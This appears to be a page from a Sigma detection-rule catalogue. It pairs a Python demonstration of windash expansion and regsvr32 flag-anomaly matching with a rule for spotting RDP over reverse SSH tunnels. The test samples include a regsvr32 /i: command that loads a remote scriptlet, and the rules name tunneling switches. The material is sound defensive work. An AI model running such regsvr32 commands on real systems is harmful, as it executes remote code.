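The windash modifier is what turns the single " -i:" in the YAML into the five dash spellings in the rendered query. The following added example (mine, not the corpus's) implements that expansion, evaluates "selection and not filter_main_flag" over constructed regsvr32 command lines, and shows why the filter's "not" has to enclose the whole OR of dash variants rather than the first one only. Expanding every "-" in the value is this example's reading of the modifier; the command lines are constructed and 203.0.113.9 is a documentation address.

```python
from itertools import product

# Added example (not part of the rule corpus): Sigma's windash expansion and the
# regsvr32 flag-anomaly rule over constructed command lines.
WINDASH_CHARS = ("-", "/", "\u2013", "\u2014", "\u2015")  # -, /, en dash, em dash, horizontal bar


def windash(value):
    """Every permutation of `value` with each '-' swapped for a windash character."""
    slots = [i for i, ch in enumerate(value) if ch == "-"]
    variants = []
    for combo in product(WINDASH_CHARS, repeat=len(slots)):
        chars = list(value)
        for index, dash in zip(slots, combo):
            chars[index] = dash
        variants.append("".join(chars))
    return variants


I_FLAG_VARIANTS = windash(" -i:")   # selection: CommandLine|contains|windash ' -i:'
N_FLAG_VARIANTS = windash(" -n ")   # filter_main_flag: CommandLine|contains|windash ' -n '


def regsvr32_flag_anomaly(image, cmdline):
    """condition: selection and not 1 of filter_main_*"""
    c = cmdline.lower()
    selection = image.lower().endswith("\\regsvr32.exe") and any(v in c for v in I_FLAG_VARIANTS)
    filter_main_flag = any(v in c for v in N_FLAG_VARIANTS)
    return selection and not filter_main_flag


REGSVR32 = "C:\\Windows\\System32\\regsvr32.exe"
# Constructed command lines (not captured samples).
SAMPLES = [
    (REGSVR32, "regsvr32.exe /s /i:http://203.0.113.9/payload.sct scrobj.dll"),   # /i without /n
    (REGSVR32, "regsvr32.exe /n /i:user32 C:\\tools\\vendor.dll"),                 # /n present: filtered
    (REGSVR32, "regsvr32.exe \u2013i:C:\\Users\\Public\\run.sct scrobj.dll"),      # en dash spelling
    (REGSVR32, "regsvr32.exe /s C:\\Program Files\\Vendor\\vendor.dll"),            # no /i at all
    ("C:\\Windows\\System32\\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL -i:x"),  # wrong image
]


def evaluate(samples=SAMPLES):
    return [regsvr32_flag_anomaly(img, cmd) for img, cmd in samples]


def precedence_demo(cmdline="regsvr32.exe /n /i:user32 C:\\tools\\vendor.dll"):
    """(correct, misgrouped): `not (A or B or ...)` versus `(not A) or B or ...`."""
    c = cmdline.lower()
    has_i = any(v in c for v in I_FLAG_VARIANTS)
    correct = has_i and not any(v in c for v in N_FLAG_VARIANTS)
    misgrouped = has_i and ((N_FLAG_VARIANTS[0] not in c) or any(v in c for v in N_FLAG_VARIANTS[1:]))
    return correct, misgrouped
```

precedence_demo shows the trap when a filter with several OR'ed variants is negated by hand: with the parentheses around the whole OR the "/n" command line is suppressed, while negating only the first variant lets it through, which is exactly the kind of silent breakage to look for when you paste a rendered query into a saved search.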
medium Moderate High FP
Potential Remote Desktop Tunneling
Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
status test author Tim Rauch, Elastic (idea) ATT&CK technique id 8a3038e8-9c9d-46f8-b184-66234a160f6f
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_command_line contains ":3389" and 
 (action_process_image_command_line in ("* -L *", "* -P *", "* -R *", "* -pw *", "* -ssh *"))))
view Sigma YAML
title: Potential Remote Desktop Tunneling
id: 8a3038e8-9c9d-46f8-b184-66234a160f6f
status: test
description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
references:
    - https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html
author: Tim Rauch, Elastic (idea)
date: 2022-09-27
tags:
    - attack.lateral-movement
    - attack.t1021
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: ':3389' # RDP port and usual SSH tunneling related switches in command line
    selection_opt:
        CommandLine|contains:
            - ' -L '
            - ' -P '
            - ' -R '
            - ' -pw '
            - ' -ssh '
    condition: all of selection*
falsepositives:
    - Unknown
level: medium
Convert to SIEM query
Showing 251-300 of 559